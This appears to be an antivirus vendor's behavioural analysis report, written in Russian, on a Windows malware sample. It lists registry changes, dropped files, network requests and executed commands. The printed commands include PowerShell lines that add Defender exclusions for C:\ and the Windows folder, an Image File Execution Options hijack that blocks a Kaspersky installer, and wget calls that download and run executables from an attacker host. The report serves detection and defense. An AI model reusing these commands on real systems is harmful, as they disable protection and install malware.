Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup_kes.exe] 'debugger' = 'fixmapi.exe'
Устанавливает следующие настройки сервисов
- [HKLM\System\CurrentControlSet\Services\KProcessHacker2] 'ImagePath' = '<Текущая директория>\x64\kprocesshacker.sys'
Создает следующие сервисы
- 'KProcessHacker2' <Текущая директория>\x64\kprocesshacker.sys
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "Add-MpPreference -ExclusionPath %WINDIR%"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' amd64.exe
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\dedka.txt
- <Текущая директория>\amd64\x86\plugins\extendedtools.dll
- <Текущая директория>\amd64\x86\plugins\dotnettools.dll
- <Текущая директория>\amd64\systeminformer.sys
- <Текущая директория>\amd64\systeminformer.exe
- <Текущая директория>\amd64\plugins\windowexplorer.dll
- <Текущая директория>\amd64\plugins\usernotes.dll
- <Текущая директория>\amd64\plugins\updater.dll
- <Текущая директория>\amd64\x86\systeminformer.exe
- <Текущая директория>\amd64\plugins\toolstatus.dll
- <Текущая директория>\amd64\plugins\networktools.dll
- <Текущая директория>\amd64\plugins\hardwaredevices.dll
- <Текущая директория>\amd64\plugins\extendedtools.dll
- <Текущая директория>\amd64\plugins\extendedservices.dll
- <Текущая директория>\amd64\plugins\extendednotifications.dll
- <Текущая директория>\amd64\plugins\dotnettools.dll
- <Текущая директория>\amd64\peview.exe
- <Текущая директория>\amd64\plugins\onlinechecks.dll
- <Текущая директория>\x64\plugins\networktools.dll
- <Текущая директория>\x64\pomadachashin.exe
- <Текущая директория>\x64\peview.exe
- <Текущая директория>\x64\plugins\windowexplorer.dll
- <Текущая директория>\x64\plugins\usernotes.dll
- <Текущая директория>\x64\plugins\trustedinstallerplugin.dll
- <Текущая директория>\x64\plugins\toolstatus.dll
- <Текущая директория>\x64\plugins\taskbarextplugin.dll
- <Текущая директория>\x64\plugins\setcriticalplugin.dll
- <Текущая директория>\x64\plugins\sbiesupport.dll
- <Текущая директория>\amd64\ksi.dll
- <Текущая директория>\x64\plugins\onlinechecks.dll
- <Текущая директория>\x64\plugins\hexpidplugin.dll
- <Текущая директория>\x64\plugins\hardwaredevices.dll
- <Текущая директория>\x64\plugins\extendedtools.dll
- <Текущая директория>\x64\plugins\extendedservices.dll
- <Текущая директория>\x64\plugins\extendednotifications.dll
- <Текущая директория>\x64\plugins\dotnettools.dll
- <Текущая директория>\x64\plugins\avgcpuplugin.dll
- <Текущая директория>\x64\pomadachashin.exe.settings.xml
- <Текущая директория>\x64\kprocesshacker.sys
- <Текущая директория>\amd64\systeminformer.exe.settings.xml
- <Текущая директория>\amd64\license.txt
- <Текущая директория>\amd64\etwguids.txt
- <Текущая директория>\amd64\copyright.txt
- <Текущая директория>\amd64\capslist.txt
- <Текущая директория>\procx64.exe
- <Текущая директория>\remprocexp.exe
- <Текущая директория>\noloadn_old_new.exe
- <Текущая директория>\amd64.exe
- <Текущая директория>\amd64\geolite2-asn.mmdb
- <Текущая директория>\ablay.exe
- <Текущая директория>\procx86.exe
- <Текущая директория>\asufer.exe
- %WINDIR%\ime\en-us\old\fxsext.ecf
- <Текущая директория>\wget.exe
- <Текущая директория>\subinacl.exe
- <Текущая директория>\rer.bat
- <Текущая директория>\dedka.bat
- <Текущая директория>\aabes.exe
- <Текущая директория>\amd64\plugins\toolstatus.sig
- <Текущая директория>\amd64\x86\plugins\extendedtools.sig
- <Текущая директория>\amd64\peview.sig
- <Текущая директория>\amd64\x86\plugins\dotnettools.sig
- <Текущая директория>\amd64\usernotesdb.xml
- <Текущая директория>\amd64\systeminformer.sig
- <Текущая директория>\amd64\systeminformer.exe.settings.xml_my
- <Текущая директория>\amd64\readme.txt
- <Текущая директория>\amd64\plugins\windowexplorer.sig
- <Текущая директория>\amd64\plugins\usernotes.sig
- <Текущая директория>\amd64\x86\systeminformer.sig
- <Текущая директория>\amd64\plugins\updater.sig
- <Текущая директория>\amd64\plugins\onlinechecks.sig
- <Текущая директория>\amd64\plugins\networktools.sig
- <Текущая директория>\amd64\plugins\hardwaredevices.sig
- <Текущая директория>\amd64\plugins\extendedtools.sig
- <Текущая директория>\amd64\plugins\extendedservices.sig
- <Текущая директория>\amd64\plugins\extendednotifications.sig
- <Текущая директория>\amd64\plugins\dotnettools.sig
- <Текущая директория>\amd64\geolite2-country.mmdb
- %WINDIR%\temp\uddcafc.tmp
Удаляет следующие файлы
- %WINDIR%\addins\fxsext.ecf
- %WINDIR%\temp\uddcafc.tmp
Сетевая активность
Подключается к
- 'ko####ay.myz.info':80
TCP
Запросы HTTP GET
- http://ko####ay.myz.info/ASUFER.exe
- http://ko####ay.myz.info/procx86.exe
- http://ko####ay.myz.info/Aabes.exe
- http://ko####ay.myz.info/ablay.exe
- http://ko####ay.myz.info/ponka.exe
- http://ko####ay.myz.info/amd64.exe
- http://ko####ay.myz.info/noloadn_OLD_New.exe
- http://ko####ay.myz.info/remprocexp.exe
- http://ko####ay.myz.info/procx64.exe
UDP
- DNS ASK ko####ay.myz.info
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'ProcessHacker' WindowName: ''
Создает и запускает на исполнение
- '<Текущая директория>\wget.exe' -i dedka.txt --continue --no-check-certificate --no-dns-cache
- '<Текущая директория>\wget.exe' -c http://kortatay.myz.info/procx64.exe
- '<Текущая директория>\wget.exe' -c http://kortatay.myz.info/amd64.exe
- '<Текущая директория>\amd64.exe'
- '<Текущая директория>\amd64\systeminformer.exe'
- '<Текущая директория>\procx64.exe'
- '<Текущая директория>\x64\pomadachashin.exe'
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""<Текущая директория>\dedka.bat" "
- '%WINDIR%\syswow64\xcopy.exe' %WINDIR%\addins %WINDIR%\IME\en-US\old /C /E /I /Q /H /R /K /O /X /Y
- '%WINDIR%\syswow64\wbem\wmic.exe' diskdrive get Name, Manufacturer, Model, DeviceID, Partitions, Status, InterfaceType, SerialNumber
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters" /v "MaxUserPort" /t REG_DWORD /d "65534" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters" /v "EnableConnectionRateLimiting" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup_kes.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver"
- '%WINDIR%\syswow64\find.exe' "5.1"
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 1
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' "SystemInformer.exe"
- '%WINDIR%\syswow64\timeout.exe' /T 3 /NOBREAK
- '%WINDIR%\syswow64\find.exe' "pomadachashin.exe"
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 3
